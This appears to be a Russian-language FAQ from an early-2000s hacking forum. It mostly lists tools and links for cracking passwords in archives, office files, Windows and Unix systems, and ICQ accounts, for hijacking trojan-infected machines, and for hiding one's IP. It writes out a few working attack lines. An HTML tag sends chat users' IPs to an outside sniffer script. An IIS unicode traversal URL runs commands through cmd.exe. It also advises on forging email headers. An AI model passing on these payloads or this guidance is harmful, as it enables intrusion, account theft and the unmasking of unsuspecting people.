Forum's FAQ

==========================================================================

Q: Почему злой модератор удалил мою мессагу?
A: 1. Ты ему не нравишься :) 
   2. Ты спрашиваешь о том, о чем есть ответы в FAQ
   3. Ты спрашиваешь то, что можно легко найти с помощью поисковиков
   4. Ты задаешь вопрос который содержит слова "Как взломать..."
   5. Ты разводишь флейм
   6. Ты высказываешься не по теме (пример: "Продам партию прокладок!")
   7. Ты критикуешь нас или форум :)(Конструктивная критика приветствуется)
Вообще мы постараемся не удалять ничего, но и вы не устраивайте на форуме
разборок и т.д.

==========================================================================

Q: Где найти крак/кенген?
A: Попробуй на http://www.astalavista.com/. Перепробуй там все поисковые engines.
   Если ищешь кейген, то выбирай engine Keygen Studio. Все кейгены всех
   крак-групп там.

==========================================================================

Q: Где достать описание к уязвимости\эксплоиту?
A: Самый большой в мире архив описаний уязвимостей и эксплоитов это:
   http://www.securityfocus.com/
   Также, можно посмотреть на:
   http://www.packetstormsecurity.com/
   Оба сайта имеют прекрасные поисковики, и если вы их использовали и
   ничего не нашли, то значит такого описания\эксплоита не существует.

==========================================================================

Q: Где скачать такую-то прогу нахаляву?
A: Это не варез форум. Такие сообщения будут удаляться.

==========================================================================

Q: Как взломать пароль к архиватору (zip, rar, и т.д.)?
A: Никак! Можно подобрать. Пишешь пароль, жмешь enter...не подходит,
   пишешь, жмешь...не подходит и т.д. Не нравится? Тогда в поисковике
   пишешь zip(rar, и т.д.)+cracker. Получишь туеву хучу программ.
   Примерно четверть из них не трояны. Вот здесь лежит полный список
   разных "ломалок" для разных архиваторов:
   http://www.password-crackers.com/crack.html
   http://arctest.cjb.net/
   Еще можно сходить на http://www.passwords.ru/.
   Так что удачи тебе :)

==========================================================================

Q: Как взломать пароль к оффисным приложениям (Word, Excel, Access, 
   OutLook, WordPerfect, Lotus Smartsuite, PDF, и т.д.)?
A: Вот здесь навалом софта для этого:
   http://www.password-crackers.com/crack1.html
   Для открытия Acrobat файлов, печати без пароля и т.д. в Acrobat Reader
   можно глянуть еще вот это.

==========================================================================

Q: Как узнать/взломать BIOS пароль? Как изменить картинку при загрузке?
A: Скачать архив с нашего сайта который лежит в разделе Cool Stuff,
   распаковать его, и прочитать Readme.txt вложенный в архив.

==========================================================================

Q: Как взломать/выдрать пассы из *.pwl файлов?
A: Лучшая программа для подбора паролей для *.pwl базы это PWL Hack, взять
   можно здесь:
   http://www.chat.ru/~zer0_iq_guy/download/pwl_h402.rar
   документация на русском для нее здесь:
   http://www.chat.ru/~zer0_iq_guy/download/pwldocs.zip
   Полный список разных программ для взлома *.pwl здесь:
   http://www.password-crackers.com/crack2.html
   Еще можно почитать инфу вот здесь:
   http://www.soft4you.com/vitas/pwl.htm
   Также мы собрали небольшой FAQ по взлому PWL основанный на сообщениях в
   HackZone форуме, лежит здесь. Если этого недостаточно, то зайти вот
   сюда и ввести "pwl".

==========================================================================

Q: Как выдрать пароли из mail/ftp клиента?
A: Вот здесь есть софт для разных:
   http://www.password-crackers.com/crack3.html

==========================================================================

Q: Как выдрать пароль из EDialer (edialer.ini)?
A: С помощью проги, которую множно взять с этого сайта из раздела
   "Наши проекты".

==========================================================================

Q: Я нашел в сети машину, зараженную трояном, но доступ к нему запаролен.
   Как мне взломать\вытащить пароль из сервера?
A: Вам пригодится программа Trojan Cracker, которая умеет вытаскивать
   пароли из: Deep Throat, NetBus, SubSeven, WinCrash, Doly, NetTrash,
   Y3K Rat, MoSucker. Взять ее можно здесь:
   http://exc0n.org/sx-rc16.zip
   Или здесь:
   http://www.tlsecurity.net/authors/sx-rc16.zip

==========================================================================

Q: Как взломать пароль от ICQ?
A: Если у вас есть база данных (icq_no.dat), то с помощью ICQrInfo:
   http://www.headstrong.de/software-icqrinfo.shtml
   Если приспичило написать мыльный троян, исходники для выдиралки пассов
   из баз данных для icq вот здесь: http://www.e.com.kg/icqpsw.zip
   Если у вас нет базы данных, то можно попробовать брутфорс, прога здесь:
   http://icq.cracks.ru/f/icqsmg14.zip

==========================================================================

Q: Как оборонить свой icq номер(или пароль на него)?
A: Почитать "Записки асечника" в разделе статьи.

Q: Как убрать баннер из ICQ?
A: Почитать "Записки асечника" в разделе статьи.

==========================================================================

Q: Как взломать пароль к ...
A: Можно посмотреть здесь, авось найдете какой-нибудь подходящий инструмент:
   http://www.packetstormsecurity.com/Crackers/

==========================================================================

Q: Где достать списки паролей, вордлисты и вордлист генераторы?
A: Больше всего списков паролей и вордлистов лежит вот здесь:
   http://www.packetstormsecurity.com/Crackers/wordlists/
   Всякие утилиты для управления вордлистами, в том числе и генераторы
   лежат здесь:
   http://www.packetstormsecurity.com/Crackers/wordlists/utilities/
   Можно посоветовать генератор Raptor, скорее всего он самый лучший
   (программа делает с вордлистами все):
   http://www.deny.de/ge/prod02.htm

==========================================================================

Q: Где лежат пароли в НТ? Как их вытащить?
A: Хэши паролей лежат в %windir%\repair\sam и %windir%\system32\config\sam,
   их нужно скопировать и вытащить из них пароли с помощью программы:
   LCP (http://lcp.chat.ru/) или
   L0phtcrack (http://www.l0phtcrack.com/)
   Подробная документация на эту тему здесь:
   http://www.osp.ru/win2000/1999/02/09.htm
   Также мы собрали небольшой FAQ по взлому NT, основанный на сообщениях в
   HackZone форуме, лежит здесь. Если этого недостаточно, то зайти вот
   сюда и ввести "sam".

==========================================================================

Q: Где лежат пароли в *nix? Как их вытащить?
A: Зашифрованные пароли лежат обычно в /etc/passwd.
   Алгоритм для шифрования - DES.
   Самая быстрая программа для перебора паролей это John The Ripper
   Взять здесь:
   http://www.openwall.com/john/john-16d.zip - Бинарики для DOS
   http://www.openwall.com/john/john-16w.zip - Бинарики для Win32
   http://www.openwall.com/john/john-1.6.tar.gz - Исходники для *nix
   Если хотите попробовать раскриптовать в онлайне по готовым словарям
   (а их там три разных), то можно заглянуть сюда:
   http://www.rawlogic.com/password/
   Для тех, кому интересно узнать все про *nix пароли, выложена подборка
   "Ru.Hacker FAQ - Паpоли в UNIX'e" здесь.

==========================================================================

Q: Где достать дефолтовые списки паролей для разного железа?
A: Самый большой список здесь:
   http://security.nerdnet.com/

==========================================================================

Q: Как взломать почтовый ящик?
A: Молотком! А узнать как ломать e-mail ящик можно, прочитав наши статьи.

==========================================================================

Q: Как достать халявный инет?
A: Несколько исчерпывающих ресурсов на эту тему:
   http://www.antilamo.narod.ru/zash/netbios.html
   http://xor.by.ru/faq/netbios.html

==========================================================================

Q: Где можно достать инфу по RFC...(или инфу по x.25, smtp, icmp) и т.д.?
A: 1. http://www.ietf.org/rfc/
   2. http://www.faqs.org/
   3. через IRC, к примеру канал #x25

==========================================================================

Q: Где можно достать список портов\протоколов и их описание?
A: Вот здесь полные списки:
   http://www.isi.edu/in-notes/iana/assignments/port-numbers
   http://www.isi.edu/in-notes/iana/assignments/protocol-numbers

==========================================================================

Q: Как узнать IP человека в чате?
A: Если чат поддерживает HTML то вводим:
   <img src="http://www.hackzone.ru/cgi-bin/sniff.cgi?your_id">
   а затем смотрим по адресу
   http://www.hackzone.ru/files/snifflog.txt
   IP всех участников чата будут обозначены меткой your_id.
   Еще можно заглянуть и почитать здесь

Q: Как узнать IP человека в ICQ?
A: Открываем DOS prompt и вводим: "netstat -a", там будет список всех
   соединений с тобой вместе с портами и IP адресами.

Q: Как узнать IP человека в IRC?
A: Пишешь /dns nickname

==========================================================================

Q: Как узнать свой IP?
A: ПУСК - Выполнить - WINIPCFG

==========================================================================

Q: Я знаю IP жертвы - это мне поможет для взлома?
A: Если IP динамический(при каждом соединении разный), то знание его тебе
   не поможет. Если IP статический...
   Ну если статический тогда тебе и карты в руки.

==========================================================================

Q: Как скрыть свой IP когда смотришь странички?
A: Использовать анонимный прокси, если у тебя таких нет, то можно
   обзавестись оными вот здесь:
   http://proxycheck.spylog.ru/
   http://www.cyberarmy.com/lists/proxy/
   и списки разных Socks, wingate, telnet проксей:
   http://tools.rosinstrument.com/proxy/proxies.htm
   http://proxys4all.cgi.net/win-tel-socks.shtml
   Если же тебе нужно посмотреть анонимно только один\два сайта, или же ты
   уже сидишь за проксей (например: на работе), и хотишь двойную
   анонимность, то стоит использовать вот эти сервисы:
   http://www.safeweb.com/
   http://www.anonymizer.com/

==========================================================================

Q: Как скрыть IP, когда отсылаешь e-mail? Как анонимно отослать письмо?
A: 1. Через анонимный мейлер(понадобится СМТП сервер, который поддерживает
   Relaying)
   2. Через ВебРемейлер, типа http://www.cityline.ru/cgi-bin/formmail.ru
   3. Через сги скрипт, используя SendMail или что-то другое(Net::SMTP),
   можно подделать вообще все хедеры.

==========================================================================

Q: А где вообще можно почитать про анонимность в сети?
A: Вот здесь находится сайт с очень подробной информацией на эту тему:
   http://www.cached.com.ua/

==========================================================================

Q: Как узнать информацию о определенном хосте, его ОС, вебсервере, и.т.д?
   Как узнать информацию которую выдает о мне и моем браузере мой
   компьютер?
A: Почитать доки, а можно просто посмотреть вот эти сайты:
   http://www.netcraft.com/whats/ - Определитель OS любого сервера.
   Еще можно попробовать программу Nmap. Официальный сайт программы здесь:
   http://www.insecure.org/nmap/
   Или программу RuNmap - которая является усовершенствованной версией
   Nmap, которую перевели на русский. Взять здесь:
   http://www.nmap.ru/runmap/index.html
   Для Win32 Платформ, можно скачать вот это:
   http://www.insecure.org/nmap/dist/nmap-2.54BETA25.tgz
   Там даны исходники для компиляции под Visual C++, для запуска
   необходимы драйверы PCap v.2.1, которые можно взять здесь:
   http://netgroup-serv.polito.it/winpcap/
   Если же компилировать нет возможности, то можно скачать Nmap 4 NT от
   компании eEye, хотя ее использовать крайне нежелательно, потому что это
   старая версия, которая содержит неполную базу данных с отпечатками:
   http://www.eeye.com/html/Research/Tools/nmapnt/nmapNTsp1.zip
   Для продвинутых еще два ресурса:
   + http://rnmap.sourceforge.net/
   там находится сайт программы RNmap, которая является еще одной
   продвинутой версией программы Nmap. Ее особенность заключается в том,
   что появляется возможность устанавливать Nmap на удаленные компьютеры
   которые потом будут собирать задания с вашего сервера и сканировать
   указанные серверы. То есть можно осуществить массовое сканирование с
   помощью зараженных машин.
   + В разделе Cool Stuff есть дополнительная документация по определению
   ОС.

   http://www.rexswain.com/httpview.html - Определитель вебсервера.

   http://privacy.net/anonymizer/ - Скажет все о вас, вашем браузере,
   ява машине, покажет трейсрут до вашего айпи, и т.д.

   Хуиз утилиты - сообщит местоположение и имена, адреса админов по хосту
   http://www.all-nettools.com/
   http://www.internic.net/whois.html

==========================================================================

Q: А где вообще можно найти разные тулзы в онлайн?
A: Вот здесь: http://www.samspade.org/ их очень много.
   (Whois, Traceroute, DNS & Reverse DNS, URL Decode и т.д.)

==========================================================================

Q: Как получить доступ к компьютеру под управлением winNT?
A: Через unicode уязвимость 
   http://адрес_сайта/_vti_bin/..
   %c0%af../..%c0%af../..%c0%af../ winnt/system32/cmd.exe? /c+команда дос.

   Еще можно попробовать прогой L0phtCrack или L0phtCrack+, вторая лежит
   здесь:
   http://lcp.chat.ru/

==========================================================================

Q: Как я могу поменять свой MAC Адрес?
A: Стоит прочитать следующие документы:
   http://www.uinc.ru/articles/15/index.shtml
   http://www.uinc.ru/articles/zametki/002.shtml

Q: Как я могу поменять свой IP адрес? Как поменять его в пакетах, которые
   уходят с моей машины?
A: Проще всего это сделать под Windows 2000, например, с помощью пакета
   Tcpip_lib, который лежит здесь:
   http://www.komodia.com/

==========================================================================

Q: Что такое TELNET? Где взять доки по нему?
A: На русском вот здесь:
   http://infocity.kiev.ua/infocity/inet/telnet.zip
   На английском вот здесь:
   http://linux.manas.kg/books/teach_yourself_tcp-ip/tyt06fi.htm

==========================================================================

Q: Где достать старую версию ICQ клиента?
A: Большинство версий лежит здесь:
   http://www.cslink.net/software_archives.htm

==========================================================================

Q: А где вообще почитать про взлом чатов?
A: Вот несколько ресурсов на эту тему:
   http://xor.by.ru/faq/htmlchat.html
   http://www.hackzone.ru/articles/htmlchat.html
   http://www.hackzone.ru/articles/htmlcht.html

==========================================================================

Q: Я удалил файл с диска, и также удалил его из корзины\просто удалил файл
   с гибкого диска, что мне делать если без него я сдохну?
A: 1. В ДОС утилитах есть прога, которая называется undelete.exe,
      использовать ее.
   2. Если ДОС утилиток у тебя нету, но зато есть Norton Utilities, то
      можно использовать unerase.exe из NU.
   3. Можно посмотреть инфу и скачать программки вот здесь:
      http://www.antivirus.ru/Okno5_SUP.html

==========================================================================

Q: Как восстановить удаленный файл в разделе НТ(NTFS)?
A: Существует много утилит для этого. Вот адреса:
   http://www.restorer2000.com/ - Restorer2000(freeware)
   http://www.winternals.com/ - NT Recover(freeware)
   http://www.glasnet.ru/~frolov/ - Erase Undo(shareware)

==========================================================================

Q: Как прочитать WinNT(NTFS) разделы из Win95/Win98?
A: С помощью программы NTFS for Win98. Для записи нужно покупать другую
   программу. Найти их можно здесь:
   http://www.winternals.com/

Q: Как прочитать Linux(ex2fs) разделы из Win95/Win98/NT?
A: С помощью программы Explore2fs, которая позволяет не только читать, но
   и писать в такие разделы. Взять здесь:
   http://uranus.it.swin.edu.au/~jn/linux/

==========================================================================

Q: Где достать BackOrifice, его исходники и доки к нему(можно на русском)?
A: Официальный сайт разработки программы(сама программа, исходники,
   документация и SDK для программистов) здесь:
   http://sourceforge.net/project/showfiles.php?group_id=4487
   Документация на русском здесь:
   http://www.nmap.ru/reading/papers/bo2k-faq.htm

==========================================================================

Q: Где посмотреть список программ которые запускаются при запуске системы?
A: Необходимо скачать программу RegScan из раздела Our Projects на этом
   сайте, которая и покажет ВСЕ программы, которые запускаются при
   загрузке системы.

==========================================================================

Q: Какой серийный номер для Shadow Scan или Shadow Security Scanner?
A: Вот здесь ясно указано, что для Русских бесплатно.

==========================================================================

Q: Я вот тут наткнулся на диске на файл с расширением *.xxx, чо за файл то?
A: Очень большой список разных расширений и соответственных приложений
   лежит здесь:
   http://www.windrivers.com/tech/filext.htm

==========================================================================

Q: А где взять исходники форума, похожего на ваш, и бесплатно?
A: Вот здесь Оригинальная версия:
   http://www.worldwidemart.com/scripts/
   А вот здесь можно найти любой, который вас устраивает:
   http://www.cgi.ru/
   А если желаете получить исходник именно нашего форума, то вам нужно
   зайти в раздел Our Projects, чтобы скачать его.

==========================================================================

Q: Что мне будет за хакерство?
A: Вырезки из кодекса, хорошо описывающие сроки наказания можно почитать
   здесь: http://antilamo.narod.ru/zash/zachto.html

==========================================================================

Q: Что делать, если этого FAQ мне не достаточно?
A: Почитать вот это, авось поможет.

==========================================================================